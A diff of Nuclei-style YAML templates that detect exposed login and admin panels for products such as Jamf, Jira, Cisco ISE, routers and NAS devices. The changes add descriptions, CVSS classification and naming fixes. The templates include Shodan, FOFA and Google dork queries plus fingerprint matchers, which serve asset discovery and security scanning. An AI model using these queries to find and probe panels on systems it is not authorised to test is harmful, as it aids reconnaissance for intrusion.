cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
shodan-query: http.html:"IBM WebSphere Portal"
|
||||
tags: ibm,websphere,panel
|
||||
|
@ -27,3 +32,5 @@ requests:
|
|||
- 'IBM WebSphere Portal'
|
||||
- 'IBMPortalWeb'
|
||||
condition: or
|
||||
|
||||
# Enhanced by md on 2022/11/21
|
||||
|
|
|
@ -1,11 +1,16 @@
|
|||
id: icc-pro-login
|
||||
|
||||
info:
|
||||
name: ICC Pro System Login
|
||||
name: ICC PRO Login Panel - Detect
|
||||
author: DhiyaneshDk
|
||||
severity: info
|
||||
description: ICC PRO login panel was detected.
|
||||
reference:
|
||||
- https://www.exploit-db.com/ghdb/7980
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"Login to ICC PRO system"
|
||||
|
@ -31,3 +36,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/21
|
||||
|
|
|
@ -1,9 +1,14 @@
|
|||
id: icewarp-panel-detect
|
||||
|
||||
info:
|
||||
name: IceWarp Panel Detect
|
||||
name: IceWarp Login Panel - Detect
|
||||
author: ritikchaddha
|
||||
severity: info
|
||||
description: IceWarp login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"icewarp"
|
||||
|
@ -32,3 +37,5 @@ requests:
|
|||
group: 1
|
||||
regex:
|
||||
- 'Server: (.{4,20})'
|
||||
|
||||
# Enhanced by md on 2022/11/21
|
||||
|
|
|
@ -1,9 +1,14 @@
|
|||
id: icinga-web-login
|
||||
|
||||
info:
|
||||
name: Icinga Web 2 Login
|
||||
name: Icinga Web 2 Login Panel - Detect
|
||||
author: dhiyaneshDK
|
||||
severity: info
|
||||
description: Icinga Web 2 login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
shodan-query: http.title:"Icinga Web 2 Login"
|
||||
tags: panel,icinga
|
||||
|
@ -21,3 +26,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/21
|
||||
|
|
|
@ -1,9 +1,14 @@
|
|||
id: identity-services-engine
|
||||
|
||||
info:
|
||||
name: Identity Services Engine
|
||||
name: Cisco Identity Services Engine Admin Login Panel - Detect
|
||||
author: dhiyaneshDK
|
||||
severity: info
|
||||
description: Cisco Identity Services Engine admin login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
shodan-query: http.title:"Identity Services Engine"
|
||||
tags: panel
|
||||
|
@ -19,3 +24,5 @@ requests:
|
|||
- type: word
|
||||
words:
|
||||
- '<title>Identity Services Engine</title>'
|
||||
|
||||
# Enhanced by md on 2022/11/21
|
||||
|
|
|
@ -1,9 +1,14 @@
|
|||
id: ilch-admin-panel
|
||||
|
||||
info:
|
||||
name: Ilch CMS Admin Panel
|
||||
name: Ilch CMS Admin Login Panel - Detect
|
||||
author: ritikchaddha
|
||||
severity: info
|
||||
description: Ilch CMS admin login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.title:"Ilch"
|
||||
|
@ -24,3 +29,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/21
|
||||
|
|
|
@ -1,11 +1,16 @@
|
|||
id: incapptic-connect-panel
|
||||
|
||||
info:
|
||||
name: IVANTI Incapptic Connect
|
||||
name: Ivanti Incapptic Connect Panel - Detect
|
||||
author: righettod
|
||||
severity: info
|
||||
description: Ivanti Incapptic Connect panel was detected.
|
||||
reference:
|
||||
- https://www.ivanti.com/products/incapptic-connect
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
shodan-query:
|
||||
- http.title:"incapptic"
|
||||
|
@ -34,3 +39,5 @@ requests:
|
|||
- "status_code==200"
|
||||
- "('-1067582922' == mmh3(base64_py(body)))"
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/11/21
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
id: influxdb-detect
|
||||
id: influxdb-panel
|
||||
|
||||
info:
|
||||
name: InfluxDB Detect
|
||||
|
@ -9,7 +9,7 @@ info:
|
|||
- https://www.influxdata.com/
|
||||
metadata:
|
||||
shodan-query: http.title:"InfluxDB - Admin Interface"
|
||||
tags: tech,influxdb
|
||||
tags: panel,influxdb
|
||||
|
||||
requests:
|
||||
- method: GET
|
|
@ -1,11 +1,16 @@
|
|||
id: intelbras-login
|
||||
|
||||
info:
|
||||
name: Intelbras Login
|
||||
name: Intelbras Router Login Panel - Detect
|
||||
author: DhiyaneshDK
|
||||
severity: info
|
||||
description: Intelbras router logjn panel was detected.
|
||||
reference:
|
||||
- https://www.exploit-db.com/ghdb/7272
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
shodan-query: http.title:"Intelbras"
|
||||
google-query: intitle:"Intelbras" "All Rights Reserved" -.com
|
||||
|
@ -25,3 +30,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/21
|
||||
|
|
|
@ -1,9 +1,14 @@
|
|||
id: intelbras-panel
|
||||
|
||||
info:
|
||||
name: Intelbras Panel
|
||||
name: Intelbras Router Panel - Detect
|
||||
author: pikpikcu
|
||||
severity: info
|
||||
description: Intelbras router panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.title:"Intelbras"
|
||||
|
@ -29,3 +34,5 @@ requests:
|
|||
group: 1
|
||||
regex:
|
||||
- 'id="product">([A-Za-z 0-9]+)<\/p>'
|
||||
|
||||
# Enhanced by md on 2022/11/21
|
||||
|
|
|
@ -1,9 +1,14 @@
|
|||
id: intellian-aptus-panel
|
||||
|
||||
info:
|
||||
name: Intellian Aptus Web Login Panel
|
||||
name: Intellian Aptus Web Login Panel - Detect
|
||||
author: princechaddha
|
||||
severity: info
|
||||
description: Intelllian Aptus Web login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
shodan-query: http.title:"Intellian Aptus Web"
|
||||
tags: panel,intellian,aptus
|
||||
|
@ -31,3 +36,5 @@ requests:
|
|||
group: 1
|
||||
regex:
|
||||
- "<title>Intellian Aptus Web (.*)</title>"
|
||||
|
||||
# Enhanced by md on 2022/11/21
|
||||
|
|
|
@ -1,9 +1,14 @@
|
|||
id: intelliflash-login-panel
|
||||
|
||||
info:
|
||||
name: IntelliFlash Login Panel Detect
|
||||
name: IntelliFlash Login Panel - Detect
|
||||
author: princechaddha
|
||||
severity: info
|
||||
description: IntelliFlash login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
tags: panel,intelliflash
|
||||
|
||||
requests:
|
||||
|
@ -21,3 +26,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/21
|
||||
|
|
|
@ -1,9 +1,14 @@
|
|||
id: iomega-emc-shared-nas
|
||||
|
||||
info:
|
||||
name: Iomega Lenovo EMC with shared NAS
|
||||
name: Iomega LenovoEMC NAS Login Panel - Detect
|
||||
author: e_schultze_
|
||||
severity: info
|
||||
description: Iomega LenovoEMC NAS login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
tags: panel
|
||||
|
||||
requests:
|
||||
|
@ -28,3 +33,5 @@ requests:
|
|||
words:
|
||||
- "iomega"
|
||||
part: header
|
||||
|
||||
# Enhanced by md on 2022/11/21
|
||||
|
|
|
@ -1,9 +1,14 @@
|
|||
id: ipdiva-mediation-panel
|
||||
|
||||
info:
|
||||
name: IPdiva Mediation Panel Detect
|
||||
name: IPdiva Mediation Login Panel - Detect
|
||||
author: ritikchaddha
|
||||
severity: info
|
||||
description: IPdiva Mediation login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.html:"IPdiva"
|
||||
|
@ -30,3 +35,5 @@ requests:
|
|||
part: body
|
||||
words:
|
||||
- "IPdiva Secure"
|
||||
|
||||
# Enhanced by md on 2022/11/21
|
||||
|
|
|
@ -1,11 +1,16 @@
|
|||
id: iptime-router
|
||||
|
||||
info:
|
||||
name: ipTIME Router Login
|
||||
name: ipTIME Router Login Panel - Detect
|
||||
author: gy741
|
||||
severity: info
|
||||
description: ipTIME router login panel was detected.
|
||||
reference:
|
||||
- http://pierrekim.github.io/blog/2015-07-01-poc-with-RCE-against-127-iptime-router-models.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
tags: panel,login,iptime,router
|
||||
|
||||
requests:
|
||||
|
@ -29,3 +34,5 @@ requests:
|
|||
group: 1
|
||||
regex:
|
||||
- <TITLE>ipTIME ([A-Z0-9_-]+)<\/TITLE>
|
||||
|
||||
# Enhanced by md on 2022/11/21
|
||||
|
|
|
@ -1,9 +1,14 @@
|
|||
id: issabel-login
|
||||
|
||||
info:
|
||||
name: Issabel Login Panel
|
||||
name: Issabel Login Panel - Detect
|
||||
author: pikpikcu
|
||||
severity: info
|
||||
description: Issabel login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
fofa-query: title="Issabel"
|
||||
tags: issabel,panel
|
||||
|
@ -25,3 +30,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/21
|
||||
|
|
|
@ -1,9 +1,14 @@
|
|||
id: istat-panel-detect
|
||||
|
||||
info:
|
||||
name: i-STAT Panel Detect
|
||||
name: Abbott i-STAT Login Panel - Detect
|
||||
author: princechaddha
|
||||
severity: info
|
||||
description: Abbott i-STAT login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
tags: panel,abbott,istat
|
||||
|
||||
requests:
|
||||
|
@ -21,3 +26,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/21
|
||||
|
|
|
@ -1,10 +1,14 @@
|
|||
id: itop-panel
|
||||
|
||||
info:
|
||||
name: iTop Instance Detection Template
|
||||
name: Combodo iTop Login Panel - Detect
|
||||
author: righettod
|
||||
severity: info
|
||||
description: Try to detect the presence of a Combodo iTop instance via the login page
|
||||
description: Combodo iTop login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
tags: panel,itop
|
||||
|
||||
requests:
|
||||
|
@ -25,3 +29,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/21
|
||||
|
|
|
@ -1,9 +1,14 @@
|
|||
id: ixbusweb-panel
|
||||
|
||||
info:
|
||||
name: iXBusWeb Panel Detect
|
||||
name: iXBus Login Panel - Detect
|
||||
author: Podalirius
|
||||
severity: info
|
||||
description: iXBus login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
shodan-query: http.title:"iXBus"
|
||||
tags: panel,ixbusweb,cms
|
||||
|
@ -29,3 +34,5 @@ requests:
|
|||
group: 2
|
||||
regex:
|
||||
- '(iXBusWeb[\n\t ]+\((([0-9]+(.[0-9]+)?(.[0-9]+)?(.[0-9]+)?))\))'
|
||||
|
||||
# Enhanced by md on 2022/11/21
|
||||
|
|
|
@ -1,11 +1,16 @@
|
|||
id: ixcache-panel
|
||||
|
||||
info:
|
||||
name: iXCache Panel Detect
|
||||
name: iXCache Login Panel - Detect
|
||||
author: ffffffff0x
|
||||
severity: info
|
||||
description: iXCache login panel was detected.
|
||||
reference:
|
||||
- https://www.panabit.com/cn/product/iXCache/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
fofa-query: app="iXCache"
|
||||
tags: ixcache,panel
|
||||
|
@ -27,3 +32,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 302
|
||||
|
||||
# Enhanced by md on 2022/11/21
|
||||
|
|
|
@ -1,9 +1,14 @@
|
|||
id: jamf-login
|
||||
|
||||
info:
|
||||
name: Jamf Pro Login
|
||||
name: Jamf Pro Login Panel - Detect
|
||||
author: DhiyaneshDk
|
||||
severity: info
|
||||
description: Jamf Pro login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"Jamf Pro"
|
||||
|
@ -25,3 +30,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 401
|
||||
|
||||
# Enhanced by md on 2022/11/21
|
||||
|
|
|
@ -1,9 +1,14 @@
|
|||
id: jamf-panel
|
||||
|
||||
info:
|
||||
name: JAMF MDM Panel
|
||||
name: Jamf MDM Login Panel - Detect
|
||||
author: pdteam,idealphase
|
||||
severity: info
|
||||
description: Jamf Mobile Device Management login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
shodan-query: http.favicon.hash:1262005940
|
||||
tags: jamf,panel,mdm
|
||||
|
@ -30,3 +35,5 @@ requests:
|
|||
group: 1
|
||||
regex:
|
||||
- '<meta name=\"version\" content=\"(.*)\">'
|
||||
|
||||
# Enhanced by md on 2022/11/21
|
||||
|
|
|
@ -1,9 +1,14 @@
|
|||
id: jamf-setup-assistant
|
||||
|
||||
info:
|
||||
name: Jamf Pro Setup Assistant
|
||||
name: Jamf Pro Setup Assistant Panel - Detect
|
||||
author: ritikchaddha
|
||||
severity: info
|
||||
description: Jamf Pro Setup Assistant panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.html:"Jamf Pro Setup"
|
||||
|
@ -23,3 +28,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/21
|
||||
|
|
|
@ -1,9 +1,14 @@
|
|||
id: jaspersoft-panel
|
||||
|
||||
info:
|
||||
name: Jaspersoft Panel Login
|
||||
name: TIBCO Jaspersoft Login Panel - Detect
|
||||
author: koti2,daffainfo
|
||||
severity: info
|
||||
description: TIBCO Jaspersoft login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
shodan-query: http.title:"Jaspersoft"
|
||||
tags: panel,jaspersoft
|
||||
|
@ -27,3 +32,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/21
|
||||
|
|
|
@ -1,9 +1,14 @@
|
|||
id: jeedom-panel
|
||||
|
||||
info:
|
||||
name: Jeedom Login Panel
|
||||
name: Jeedom Login Panel - Detect
|
||||
author: pikpikcu,daffainfo
|
||||
severity: info
|
||||
description: Jeedom login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
shodan-query: http.title:"Jeedom"
|
||||
tags: panel,jeedom,login
|
||||
|
@ -25,3 +30,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/21
|
||||
|
|
|
@ -1,10 +1,14 @@
|
|||
id: jenkins-api-panel
|
||||
|
||||
info:
|
||||
name: Jenkins API Instance Detection Template
|
||||
name: Jenkins API Panel - Detect
|
||||
author: righettod
|
||||
severity: info
|
||||
description: Try to detect the presence of a Jenkins API instance via the API default XML endpoint
|
||||
description: Jenkins API panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
tags: panel,api,jenkins
|
||||
|
||||
requests:
|
||||
|
@ -21,3 +25,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/21
|
||||
|
|
|
@ -1,11 +1,16 @@
|
|||
id: jfrog-login
|
||||
|
||||
info:
|
||||
name: JFrog Login
|
||||
name: JFrog Login Panel - Detect
|
||||
author: dhiyaneshDK
|
||||
severity: info
|
||||
description: JFrog login panel was detected.
|
||||
reference:
|
||||
- https://www.exploit-db.com/ghdb/6797
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
tags: panel,jfrog,edb
|
||||
|
||||
requests:
|
||||
|
@ -21,3 +26,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/21
|
||||
|
|
|
@ -1,9 +1,14 @@
|
|||
id: jira-detect
|
||||
|
||||
info:
|
||||
name: Detect Jira Issue Management Software
|
||||
name: Jira Login Panel - Detect
|
||||
author: pdteam,philippedelteil
|
||||
severity: info
|
||||
description: Jira login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
tags: panel,jira
|
||||
|
||||
requests:
|
||||
|
@ -27,3 +32,5 @@ requests:
|
|||
group: 1
|
||||
regex:
|
||||
- 'title="JiraVersion" value="([0-9.]+)'
|
||||
|
||||
# Enhanced by md on 2022/11/21
|
||||
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue